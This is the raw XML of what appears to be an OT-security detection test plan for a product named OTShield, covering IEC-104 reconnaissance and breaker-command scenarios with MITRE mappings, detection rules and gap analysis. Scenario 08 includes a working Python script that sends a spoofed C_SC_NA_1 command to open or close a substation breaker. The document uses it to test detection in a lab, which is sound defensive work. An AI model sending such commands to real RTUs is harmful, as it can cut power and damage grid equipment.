          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>RareFunctionCodeRule</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Trigger</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>C_IC_NA_1 from an unexpected source IP for each RTU</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>MEDIUM if first-seen, else LOW</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>MITRE ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>T0846 — Remote System Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Caveat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Rule fires per (protocol, fc, src, dst). Many RTUs = many anomaly rows. Plan to dedupe in UI.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>UI verification path:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Anomalies page shows N rows (one per RTU) with title </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Rare function code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> and indicator </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>function_code:C_IC_NA_1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Sort by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>detectedAt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> to see the sweep cadence — useful to demo timing analysis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>On the embedded topology, the source IP fans out to 5 RTUs simultaneously — visually obvious 'star' pattern.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IMPACT NARRATIVE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>GI sweeps are pre-attack reconnaissance specific to electrical and water utility environments. Catching them quickly preserves the defender's information advantage:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Substation footprint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — attacker learns which RTU controls which feeder, breaker, or transformer. This map is the prerequisite for targeted attacks like scenario 08.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Operational masquerade</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — GI is normal traffic, so the attacker hopes it blends in. Source-IP analysis is the only signal differentiating it from legitimate SCADA polling.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="92400E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GAP ANALYSIS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>OTShield treats IEC-104 the same way it treats Modbus — by FC frequency. There is no IEC-104-specific semantics yet:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Source-allowlist per RTU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — substation RTUs typically talk to exactly one master. Capability needed: per-asset learned-source allowlist; alert on any new source.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>ASDU type granularity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — currently the dissector emits TI as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>function_code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>. A future rule could differentiate monitor-direction TIs (1–40) from control-direction TIs (45–69) for severity scoring.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario 08  ·  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="34"/>
        </w:rPr>
        <w:t>IEC-104 spoofed Single Command (C_SC_NA_1)</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T0855 — Unauthorized Command Message</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Severity (expected)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CRITICAL (target)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Protocol(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>IEC 60870-5-104 (TCP/2404)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Kill-chain phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Impair Process Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1D4ED8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>THREAT OVERVIEW</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>C_SC_NA_1 (TI=45) is the Single Command — used to open or close a circuit breaker. An attacker who can establish an IEC-104 session with an RTU and issue a C_SC_NA_1 with COT=6 (activation) and SCO=1 (close) can directly trip equipment. This is the technique observed in BlackEnergy3 / Industroyer attacks against Ukrainian utilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1D4ED8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>REPRODUCTION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Issue a C_SC_NA_1 against an RTU's IOA tied to a breaker. The lab RTU must be configured with a breaker IOA at a known address.</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scenario08_iec104_breaker_open.py</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>import socket, struct</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>RTU = '10.40.1.10'</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>BREAKER_IOA = 1001</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SCO = 0x01    # SE=0, QU=0, S/C=1 (execute close); set bit 7 for open</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t># STARTDT</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>s = socket.create_connection((RTU, 2404))</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>s.sendall(b'\x68\x04\x07\x00\x00\x00'); s.recv(64)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t># I-format APDU with C_SC_NA_1</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ctrl = struct.pack('&lt;HH', 0x0000, 0x0000)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>asdu_header = struct.pack('&lt;BBHH', 45, 1, 6, 1)            # TI=45, VSQ=1, COT=6, CA=1</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ioa = struct.pack('&lt;I', BREAKER_IOA)[:3]                    # 3-byte IOA</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>body = ctrl + asdu_header + ioa + bytes([SCO])</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>apdu = bytes([0x68, len(body)]) + body</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>s.sendall(apdu)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>print('breaker command sent — RTU response:', s.recv(64).hex())</w:t>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Use a lab RTU simulator that mirrors a real substation IOA layout. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>lib60870</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> has a sample server.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Source the connection from an IP that is not the legitimate SCADA master to make the cross-source nature of the attack visible.</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(none) — IEC-104 control-direction commands not yet rule-evaluated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Rule ID (gap)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>dpi.iec104_control_direction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Trigger (target)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Any TI ∈ {45..69} from an IP not on the master allowlist</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Severity (target)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>MITRE ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>T0855 — Unauthorized Command Message</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>UI verification path:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Today: command appears in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>DPI Events → Filter protocol=IEC104 functionCode=C_SC_NA_1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>. No automatic anomaly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Topology shows an L3 → L1 edge if the source is in the asset inventory at the right Purdue level → falls back to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>dpi.unauthorized_write</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (S7Comm logic was extended to detect IEC-104 isWrite, but C_SC_NA_1 is not yet flagged isWrite by the dissector).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">After the gap rule lands: anomaly with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>iec104_ti:C_SC_NA_1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ioa:1001</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>breaker_state:close</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IMPACT NARRATIVE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>This is the quintessential 'attack on the grid' demo — every sub-question in a regulator audit traces back to it:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Direct physical impact</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — a single command opens or closes a breaker; affected load can be hundreds of MW.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>No safety bypass needed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — control-direction commands are designed to be acted on instantly; the RTU's only validation is protocol-level.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Regulatory exposure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — NERC CIP-007 / IEC 62443-3-3 explicitly require detection of unauthorised command messages on the OT network.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="92400E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GAP ANALYSIS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>OTShield dissects IEC-104 (`Iec104Dissector` exists alongside Modbus and S7), but the rule layer for control-direction PDUs is incomplete:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>dpi.iec104_control_direction rule</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — fire on any TI 45–69 from a non-allowlisted source. Severity CRITICAL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Per-RTU master allowlist</w:t>
